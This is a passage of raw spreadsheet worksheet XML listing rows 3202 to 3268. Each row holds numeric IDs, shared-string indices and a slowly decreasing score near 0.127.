      <c r="A3202" s="1">
        <v>4943.0</v>
      </c>
      <c r="B3202" s="2">
        <v>4.4035764E7</v>
      </c>
      <c r="C3202" s="2" t="s">
        <v>3010</v>
      </c>
      <c r="D3202" s="2">
        <v>1.0</v>
      </c>
      <c r="E3202" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3202" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="3203" ht="15.75" customHeight="1">
      <c r="A3203" s="1">
        <v>8446.0</v>
      </c>
      <c r="B3203" s="2">
        <v>5.3964412E7</v>
      </c>
      <c r="C3203" s="2" t="s">
        <v>3011</v>
      </c>
      <c r="D3203" s="2">
        <v>1.0</v>
      </c>
      <c r="E3203" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3203" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="3204" ht="15.75" customHeight="1">
      <c r="A3204" s="1">
        <v>13260.0</v>
      </c>
      <c r="B3204" s="2">
        <v>3.4312947E7</v>
      </c>
      <c r="C3204" s="2" t="s">
        <v>3012</v>
      </c>
      <c r="D3204" s="2">
        <v>1.0</v>
      </c>
      <c r="E3204" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3204" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="3205" ht="15.75" customHeight="1">
      <c r="A3205" s="1">
        <v>11314.0</v>
      </c>
      <c r="B3205" s="2">
        <v>2.1040839E7</v>
      </c>
      <c r="C3205" s="2" t="s">
        <v>3013</v>
      </c>
      <c r="D3205" s="2">
        <v>1.0</v>
      </c>
      <c r="E3205" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3205" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="3206" ht="15.75" customHeight="1">
      <c r="A3206" s="1">
        <v>121.0</v>
      </c>
      <c r="B3206" s="2">
        <v>1.3060987E7</v>
      </c>
      <c r="C3206" s="2" t="s">
        <v>3014</v>
      </c>
      <c r="D3206" s="2">
        <v>1.0</v>
      </c>
      <c r="E3206" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3206" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3207" ht="15.75" customHeight="1">
      <c r="A3207" s="1">
        <v>757.0</v>
      </c>
      <c r="B3207" s="2">
        <v>2.0979135E7</v>
      </c>
      <c r="C3207" s="2" t="s">
        <v>3015</v>
      </c>
      <c r="D3207" s="2">
        <v>1.0</v>
      </c>
      <c r="E3207" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3207" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3208" ht="15.75" customHeight="1">
      <c r="A3208" s="1">
        <v>1133.0</v>
      </c>
      <c r="B3208" s="2">
        <v>2.4188227E7</v>
      </c>
      <c r="C3208" s="2" t="s">
        <v>3016</v>
      </c>
      <c r="D3208" s="2">
        <v>1.0</v>
      </c>
      <c r="E3208" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3208" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3209" ht="15.75" customHeight="1">
      <c r="A3209" s="1">
        <v>1153.0</v>
      </c>
      <c r="B3209" s="2">
        <v>2.4434089E7</v>
      </c>
      <c r="C3209" s="2" t="s">
        <v>3017</v>
      </c>
      <c r="D3209" s="2">
        <v>1.0</v>
      </c>
      <c r="E3209" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3209" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3210" ht="15.75" customHeight="1">
      <c r="A3210" s="1">
        <v>2898.0</v>
      </c>
      <c r="B3210" s="2">
        <v>3.5728403E7</v>
      </c>
      <c r="C3210" s="2" t="s">
        <v>3018</v>
      </c>
      <c r="D3210" s="2">
        <v>1.0</v>
      </c>
      <c r="E3210" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3210" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3211" ht="15.75" customHeight="1">
      <c r="A3211" s="1">
        <v>3083.0</v>
      </c>
      <c r="B3211" s="2">
        <v>3.6607152E7</v>
      </c>
      <c r="C3211" s="2" t="s">
        <v>3019</v>
      </c>
      <c r="D3211" s="2">
        <v>1.0</v>
      </c>
      <c r="E3211" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3211" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3212" ht="15.75" customHeight="1">
      <c r="A3212" s="1">
        <v>3371.0</v>
      </c>
      <c r="B3212" s="2">
        <v>3.7913208E7</v>
      </c>
      <c r="C3212" s="2" t="s">
        <v>3020</v>
      </c>
      <c r="D3212" s="2">
        <v>1.0</v>
      </c>
      <c r="E3212" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3212" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3213" ht="15.75" customHeight="1">
      <c r="A3213" s="1">
        <v>3738.0</v>
      </c>
      <c r="B3213" s="2">
        <v>3.9683371E7</v>
      </c>
      <c r="C3213" s="2" t="s">
        <v>3021</v>
      </c>
      <c r="D3213" s="2">
        <v>1.0</v>
      </c>
      <c r="E3213" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3213" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3214" ht="15.75" customHeight="1">
      <c r="A3214" s="1">
        <v>3846.0</v>
      </c>
      <c r="B3214" s="2">
        <v>4.0247567E7</v>
      </c>
      <c r="C3214" s="2" t="s">
        <v>3022</v>
      </c>
      <c r="D3214" s="2">
        <v>1.0</v>
      </c>
      <c r="E3214" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3214" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3215" ht="15.75" customHeight="1">
      <c r="A3215" s="1">
        <v>4353.0</v>
      </c>
      <c r="B3215" s="2">
        <v>4.2088721E7</v>
      </c>
      <c r="C3215" s="2" t="s">
        <v>3023</v>
      </c>
      <c r="D3215" s="2">
        <v>1.0</v>
      </c>
      <c r="E3215" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3215" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3216" ht="15.75" customHeight="1">
      <c r="A3216" s="1">
        <v>4355.0</v>
      </c>
      <c r="B3216" s="2">
        <v>4.2088721E7</v>
      </c>
      <c r="C3216" s="2" t="s">
        <v>3024</v>
      </c>
      <c r="D3216" s="2">
        <v>1.0</v>
      </c>
      <c r="E3216" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3216" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3217" ht="15.75" customHeight="1">
      <c r="A3217" s="1">
        <v>4814.0</v>
      </c>
      <c r="B3217" s="2">
        <v>4.358413E7</v>
      </c>
      <c r="C3217" s="2" t="s">
        <v>3025</v>
      </c>
      <c r="D3217" s="2">
        <v>1.0</v>
      </c>
      <c r="E3217" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3217" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3218" ht="15.75" customHeight="1">
      <c r="A3218" s="1">
        <v>5058.0</v>
      </c>
      <c r="B3218" s="2">
        <v>4.4348071E7</v>
      </c>
      <c r="C3218" s="2" t="s">
        <v>3026</v>
      </c>
      <c r="D3218" s="2">
        <v>1.0</v>
      </c>
      <c r="E3218" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3218" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3219" ht="15.75" customHeight="1">
      <c r="A3219" s="1">
        <v>5714.0</v>
      </c>
      <c r="B3219" s="2">
        <v>4.6576345E7</v>
      </c>
      <c r="C3219" s="2" t="s">
        <v>3027</v>
      </c>
      <c r="D3219" s="2">
        <v>1.0</v>
      </c>
      <c r="E3219" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3219" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3220" ht="15.75" customHeight="1">
      <c r="A3220" s="1">
        <v>6055.0</v>
      </c>
      <c r="B3220" s="2">
        <v>4.7611862E7</v>
      </c>
      <c r="C3220" s="2" t="s">
        <v>3028</v>
      </c>
      <c r="D3220" s="2">
        <v>1.0</v>
      </c>
      <c r="E3220" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3220" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3221" ht="15.75" customHeight="1">
      <c r="A3221" s="1">
        <v>8588.0</v>
      </c>
      <c r="B3221" s="2">
        <v>5.4231043E7</v>
      </c>
      <c r="C3221" s="2" t="s">
        <v>3029</v>
      </c>
      <c r="D3221" s="2">
        <v>1.0</v>
      </c>
      <c r="E3221" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3221" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3222" ht="15.75" customHeight="1">
      <c r="A3222" s="1">
        <v>9029.0</v>
      </c>
      <c r="B3222" s="2">
        <v>5.5023416E7</v>
      </c>
      <c r="C3222" s="2" t="s">
        <v>3030</v>
      </c>
      <c r="D3222" s="2">
        <v>1.0</v>
      </c>
      <c r="E3222" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3222" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3223" ht="15.75" customHeight="1">
      <c r="A3223" s="1">
        <v>9758.0</v>
      </c>
      <c r="B3223" s="2">
        <v>5.6493986E7</v>
      </c>
      <c r="C3223" s="2" t="s">
        <v>3031</v>
      </c>
      <c r="D3223" s="2">
        <v>1.0</v>
      </c>
      <c r="E3223" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3223" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3224" ht="15.75" customHeight="1">
      <c r="A3224" s="1">
        <v>9996.0</v>
      </c>
      <c r="B3224" s="2">
        <v>5.6996122E7</v>
      </c>
      <c r="C3224" s="2" t="s">
        <v>3032</v>
      </c>
      <c r="D3224" s="2">
        <v>1.0</v>
      </c>
      <c r="E3224" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3224" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3225" ht="15.75" customHeight="1">
      <c r="A3225" s="1">
        <v>11756.0</v>
      </c>
      <c r="B3225" s="2">
        <v>2.4127273E7</v>
      </c>
      <c r="C3225" s="2" t="s">
        <v>3033</v>
      </c>
      <c r="D3225" s="2">
        <v>1.0</v>
      </c>
      <c r="E3225" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3225" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3226" ht="15.75" customHeight="1">
      <c r="A3226" s="1">
        <v>11828.0</v>
      </c>
      <c r="B3226" s="2">
        <v>2.4645107E7</v>
      </c>
      <c r="C3226" s="2" t="s">
        <v>3034</v>
      </c>
      <c r="D3226" s="2">
        <v>1.0</v>
      </c>
      <c r="E3226" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3226" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3227" ht="15.75" customHeight="1">
      <c r="A3227" s="1">
        <v>12864.0</v>
      </c>
      <c r="B3227" s="2">
        <v>3.1881626E7</v>
      </c>
      <c r="C3227" s="2" t="s">
        <v>3035</v>
      </c>
      <c r="D3227" s="2">
        <v>1.0</v>
      </c>
      <c r="E3227" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3227" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3228" ht="15.75" customHeight="1">
      <c r="A3228" s="1">
        <v>15040.0</v>
      </c>
      <c r="B3228" s="2">
        <v>4.1579595E7</v>
      </c>
      <c r="C3228" s="2" t="s">
        <v>3036</v>
      </c>
      <c r="D3228" s="2">
        <v>1.0</v>
      </c>
      <c r="E3228" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3228" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3229" ht="15.75" customHeight="1">
      <c r="A3229" s="1">
        <v>15835.0</v>
      </c>
      <c r="B3229" s="2">
        <v>4.4351282E7</v>
      </c>
      <c r="C3229" s="2" t="s">
        <v>3037</v>
      </c>
      <c r="D3229" s="2">
        <v>1.0</v>
      </c>
      <c r="E3229" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3229" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3230" ht="15.75" customHeight="1">
      <c r="A3230" s="1">
        <v>15979.0</v>
      </c>
      <c r="B3230" s="2">
        <v>4.4905763E7</v>
      </c>
      <c r="C3230" s="2" t="s">
        <v>3038</v>
      </c>
      <c r="D3230" s="2">
        <v>1.0</v>
      </c>
      <c r="E3230" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3230" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3231" ht="15.75" customHeight="1">
      <c r="A3231" s="1">
        <v>16271.0</v>
      </c>
      <c r="B3231" s="2">
        <v>4.5782397E7</v>
      </c>
      <c r="C3231" s="2" t="s">
        <v>3039</v>
      </c>
      <c r="D3231" s="2">
        <v>1.0</v>
      </c>
      <c r="E3231" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3231" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3232" ht="15.75" customHeight="1">
      <c r="A3232" s="1">
        <v>17444.0</v>
      </c>
      <c r="B3232" s="2">
        <v>4.9789309E7</v>
      </c>
      <c r="C3232" s="2" t="s">
        <v>3040</v>
      </c>
      <c r="D3232" s="2">
        <v>1.0</v>
      </c>
      <c r="E3232" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3232" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3233" ht="15.75" customHeight="1">
      <c r="A3233" s="1">
        <v>18997.0</v>
      </c>
      <c r="B3233" s="2">
        <v>5.4432895E7</v>
      </c>
      <c r="C3233" s="2" t="s">
        <v>3041</v>
      </c>
      <c r="D3233" s="2">
        <v>1.0</v>
      </c>
      <c r="E3233" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3233" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3234" ht="15.75" customHeight="1">
      <c r="A3234" s="1">
        <v>28736.0</v>
      </c>
      <c r="B3234" s="2">
        <v>2.8007392E7</v>
      </c>
      <c r="C3234" s="2" t="s">
        <v>3042</v>
      </c>
      <c r="D3234" s="2">
        <v>1.0</v>
      </c>
      <c r="E3234" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3234" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="3235" ht="15.75" customHeight="1">
      <c r="A3235" s="1">
        <v>14088.0</v>
      </c>
      <c r="B3235" s="2">
        <v>3.7717642E7</v>
      </c>
      <c r="C3235" s="2" t="s">
        <v>3043</v>
      </c>
      <c r="D3235" s="2">
        <v>1.0</v>
      </c>
      <c r="E3235" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3235" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="3236" ht="15.75" customHeight="1">
      <c r="A3236" s="1">
        <v>30095.0</v>
      </c>
      <c r="B3236" s="2">
        <v>3.6442072E7</v>
      </c>
      <c r="C3236" s="2" t="s">
        <v>3044</v>
      </c>
      <c r="D3236" s="2">
        <v>1.0</v>
      </c>
      <c r="E3236" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3236" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="3237" ht="15.75" customHeight="1">
      <c r="A3237" s="1">
        <v>33236.0</v>
      </c>
      <c r="B3237" s="2">
        <v>7289601.0</v>
      </c>
      <c r="C3237" s="2" t="s">
        <v>3045</v>
      </c>
      <c r="D3237" s="2">
        <v>1.0</v>
      </c>
      <c r="E3237" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3237" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="3238" ht="15.75" customHeight="1">
      <c r="A3238" s="1">
        <v>5166.0</v>
      </c>
      <c r="B3238" s="2">
        <v>4.4750867E7</v>
      </c>
      <c r="C3238" s="2" t="s">
        <v>3046</v>
      </c>
      <c r="D3238" s="2">
        <v>1.0</v>
      </c>
      <c r="E3238" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3238" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="3239" ht="15.75" customHeight="1">
      <c r="A3239" s="1">
        <v>6457.0</v>
      </c>
      <c r="B3239" s="2">
        <v>4.8611517E7</v>
      </c>
      <c r="C3239" s="2" t="s">
        <v>3047</v>
      </c>
      <c r="D3239" s="2">
        <v>1.0</v>
      </c>
      <c r="E3239" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3239" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="3240" ht="15.75" customHeight="1">
      <c r="A3240" s="1">
        <v>12925.0</v>
      </c>
      <c r="B3240" s="2">
        <v>3.230255E7</v>
      </c>
      <c r="C3240" s="2" t="s">
        <v>3048</v>
      </c>
      <c r="D3240" s="2">
        <v>1.0</v>
      </c>
      <c r="E3240" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3240" s="2">
        <v>0.1273946360153256</v>
      </c>
    </row>
    <row r="3241" ht="15.75" customHeight="1">
      <c r="A3241" s="1">
        <v>668.0</v>
      </c>
      <c r="B3241" s="2">
        <v>2.024467E7</v>
      </c>
      <c r="C3241" s="2" t="s">
        <v>3049</v>
      </c>
      <c r="D3241" s="2">
        <v>1.0</v>
      </c>
      <c r="E3241" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3241" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="3242" ht="15.75" customHeight="1">
      <c r="A3242" s="1">
        <v>8894.0</v>
      </c>
      <c r="B3242" s="2">
        <v>5.4788108E7</v>
      </c>
      <c r="C3242" s="2" t="s">
        <v>3050</v>
      </c>
      <c r="D3242" s="2">
        <v>1.0</v>
      </c>
      <c r="E3242" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3242" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="3243" ht="15.75" customHeight="1">
      <c r="A3243" s="1">
        <v>12969.0</v>
      </c>
      <c r="B3243" s="2">
        <v>3.2547985E7</v>
      </c>
      <c r="C3243" s="2" t="s">
        <v>3051</v>
      </c>
      <c r="D3243" s="2">
        <v>1.0</v>
      </c>
      <c r="E3243" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3243" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="3244" ht="15.75" customHeight="1">
      <c r="A3244" s="1">
        <v>638.0</v>
      </c>
      <c r="B3244" s="2">
        <v>1.9749497E7</v>
      </c>
      <c r="C3244" s="2" t="s">
        <v>3052</v>
      </c>
      <c r="D3244" s="2">
        <v>1.0</v>
      </c>
      <c r="E3244" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3244" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="3245" ht="15.75" customHeight="1">
      <c r="A3245" s="1">
        <v>17332.0</v>
      </c>
      <c r="B3245" s="2">
        <v>4.9374032E7</v>
      </c>
      <c r="C3245" s="2" t="s">
        <v>3053</v>
      </c>
      <c r="D3245" s="2">
        <v>1.0</v>
      </c>
      <c r="E3245" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3245" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="3246" ht="15.75" customHeight="1">
      <c r="A3246" s="1">
        <v>2840.0</v>
      </c>
      <c r="B3246" s="2">
        <v>3.5439742E7</v>
      </c>
      <c r="C3246" s="2" t="s">
        <v>3054</v>
      </c>
      <c r="D3246" s="2">
        <v>1.0</v>
      </c>
      <c r="E3246" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3246" s="2">
        <v>0.1271043771043772</v>
      </c>
    </row>
    <row r="3247" ht="15.75" customHeight="1">
      <c r="A3247" s="1">
        <v>217.0</v>
      </c>
      <c r="B3247" s="2">
        <v>1.4587826E7</v>
      </c>
      <c r="C3247" s="2" t="s">
        <v>3055</v>
      </c>
      <c r="D3247" s="2">
        <v>1.0</v>
      </c>
      <c r="E3247" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3247" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="3248" ht="15.75" customHeight="1">
      <c r="A3248" s="1">
        <v>3104.0</v>
      </c>
      <c r="B3248" s="2">
        <v>3.6720281E7</v>
      </c>
      <c r="C3248" s="2" t="s">
        <v>3056</v>
      </c>
      <c r="D3248" s="2">
        <v>1.0</v>
      </c>
      <c r="E3248" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3248" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="3249" ht="15.75" customHeight="1">
      <c r="A3249" s="1">
        <v>25834.0</v>
      </c>
      <c r="B3249" s="2">
        <v>1.4778698E7</v>
      </c>
      <c r="C3249" s="2" t="s">
        <v>2809</v>
      </c>
      <c r="D3249" s="2">
        <v>1.0</v>
      </c>
      <c r="E3249" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3249" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="3250" ht="15.75" customHeight="1">
      <c r="A3250" s="1">
        <v>32861.0</v>
      </c>
      <c r="B3250" s="2">
        <v>6280078.0</v>
      </c>
      <c r="C3250" s="2" t="s">
        <v>2809</v>
      </c>
      <c r="D3250" s="2">
        <v>1.0</v>
      </c>
      <c r="E3250" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3250" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="3251" ht="15.75" customHeight="1">
      <c r="A3251" s="1">
        <v>3103.0</v>
      </c>
      <c r="B3251" s="2">
        <v>3.6713778E7</v>
      </c>
      <c r="C3251" s="2" t="s">
        <v>3057</v>
      </c>
      <c r="D3251" s="2">
        <v>1.0</v>
      </c>
      <c r="E3251" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3251" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="3252" ht="15.75" customHeight="1">
      <c r="A3252" s="1">
        <v>4344.0</v>
      </c>
      <c r="B3252" s="2">
        <v>4.2078577E7</v>
      </c>
      <c r="C3252" s="2" t="s">
        <v>3058</v>
      </c>
      <c r="D3252" s="2">
        <v>1.0</v>
      </c>
      <c r="E3252" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3252" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="3253" ht="15.75" customHeight="1">
      <c r="A3253" s="1">
        <v>15620.0</v>
      </c>
      <c r="B3253" s="2">
        <v>4.3555119E7</v>
      </c>
      <c r="C3253" s="2" t="s">
        <v>3059</v>
      </c>
      <c r="D3253" s="2">
        <v>1.0</v>
      </c>
      <c r="E3253" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3253" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="3254" ht="15.75" customHeight="1">
      <c r="A3254" s="1">
        <v>18713.0</v>
      </c>
      <c r="B3254" s="2">
        <v>5.3660235E7</v>
      </c>
      <c r="C3254" s="2" t="s">
        <v>3060</v>
      </c>
      <c r="D3254" s="2">
        <v>1.0</v>
      </c>
      <c r="E3254" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3254" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="3255" ht="15.75" customHeight="1">
      <c r="A3255" s="1">
        <v>1948.0</v>
      </c>
      <c r="B3255" s="2">
        <v>3.0233442E7</v>
      </c>
      <c r="C3255" s="2" t="s">
        <v>3061</v>
      </c>
      <c r="D3255" s="2">
        <v>1.0</v>
      </c>
      <c r="E3255" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3255" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="3256" ht="15.75" customHeight="1">
      <c r="A3256" s="1">
        <v>8302.0</v>
      </c>
      <c r="B3256" s="2">
        <v>5.3561366E7</v>
      </c>
      <c r="C3256" s="2" t="s">
        <v>3062</v>
      </c>
      <c r="D3256" s="2">
        <v>1.0</v>
      </c>
      <c r="E3256" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3256" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="3257" ht="15.75" customHeight="1">
      <c r="A3257" s="1">
        <v>11618.0</v>
      </c>
      <c r="B3257" s="2">
        <v>2.3073102E7</v>
      </c>
      <c r="C3257" s="2" t="s">
        <v>3063</v>
      </c>
      <c r="D3257" s="2">
        <v>1.0</v>
      </c>
      <c r="E3257" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3257" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="3258" ht="15.75" customHeight="1">
      <c r="A3258" s="1">
        <v>12437.0</v>
      </c>
      <c r="B3258" s="2">
        <v>2.9233025E7</v>
      </c>
      <c r="C3258" s="2" t="s">
        <v>3064</v>
      </c>
      <c r="D3258" s="2">
        <v>1.0</v>
      </c>
      <c r="E3258" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3258" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="3259" ht="15.75" customHeight="1">
      <c r="A3259" s="1">
        <v>12667.0</v>
      </c>
      <c r="B3259" s="2">
        <v>3.0578139E7</v>
      </c>
      <c r="C3259" s="2" t="s">
        <v>3065</v>
      </c>
      <c r="D3259" s="2">
        <v>1.0</v>
      </c>
      <c r="E3259" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3259" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="3260" ht="15.75" customHeight="1">
      <c r="A3260" s="1">
        <v>16702.0</v>
      </c>
      <c r="B3260" s="2">
        <v>4.7398214E7</v>
      </c>
      <c r="C3260" s="2" t="s">
        <v>3066</v>
      </c>
      <c r="D3260" s="2">
        <v>1.0</v>
      </c>
      <c r="E3260" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3260" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="3261" ht="15.75" customHeight="1">
      <c r="A3261" s="1">
        <v>17109.0</v>
      </c>
      <c r="B3261" s="2">
        <v>4.8730519E7</v>
      </c>
      <c r="C3261" s="2" t="s">
        <v>3067</v>
      </c>
      <c r="D3261" s="2">
        <v>1.0</v>
      </c>
      <c r="E3261" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3261" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="3262" ht="15.75" customHeight="1">
      <c r="A3262" s="1">
        <v>18942.0</v>
      </c>
      <c r="B3262" s="2">
        <v>5.4329528E7</v>
      </c>
      <c r="C3262" s="2" t="s">
        <v>3068</v>
      </c>
      <c r="D3262" s="2">
        <v>1.0</v>
      </c>
      <c r="E3262" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3262" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="3263" ht="15.75" customHeight="1">
      <c r="A3263" s="1">
        <v>10896.0</v>
      </c>
      <c r="B3263" s="2">
        <v>1.6579287E7</v>
      </c>
      <c r="C3263" s="2" t="s">
        <v>3069</v>
      </c>
      <c r="D3263" s="2">
        <v>1.0</v>
      </c>
      <c r="E3263" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3263" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="3264" ht="15.75" customHeight="1">
      <c r="A3264" s="1">
        <v>335.0</v>
      </c>
      <c r="B3264" s="2">
        <v>1.5823004E7</v>
      </c>
      <c r="C3264" s="2" t="s">
        <v>3070</v>
      </c>
      <c r="D3264" s="2">
        <v>1.0</v>
      </c>
      <c r="E3264" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3264" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="3265" ht="15.75" customHeight="1">
      <c r="A3265" s="1">
        <v>2283.0</v>
      </c>
      <c r="B3265" s="2">
        <v>3.2549944E7</v>
      </c>
      <c r="C3265" s="2" t="s">
        <v>3071</v>
      </c>
      <c r="D3265" s="2">
        <v>1.0</v>
      </c>
      <c r="E3265" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3265" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="3266" ht="15.75" customHeight="1">
      <c r="A3266" s="1">
        <v>5228.0</v>
      </c>
      <c r="B3266" s="2">
        <v>4.4978732E7</v>
      </c>
      <c r="C3266" s="2" t="s">
        <v>3072</v>
      </c>
      <c r="D3266" s="2">
        <v>1.0</v>
      </c>
      <c r="E3266" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3266" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="3267" ht="15.75" customHeight="1">
      <c r="A3267" s="1">
        <v>6029.0</v>
      </c>
      <c r="B3267" s="2">
        <v>4.753387E7</v>
      </c>
      <c r="C3267" s="2" t="s">
        <v>3073</v>
      </c>
      <c r="D3267" s="2">
        <v>1.0</v>
      </c>
      <c r="E3267" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3267" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="3268" ht="15.75" customHeight="1">
      <c r="A3268" s="1">
        <v>18802.0</v>
      </c>
      <c r="B3268" s="2">
        <v>5.3863794E7</v>
      </c>
      <c r="C3268" s="2" t="s">
        <v>3074</v>
      </c>
      <c r="D3268" s="2">
        <v>1.0</v>
      </c>
      <c r="E3268" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3268" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="3269" ht="15.75" customHeight="1">
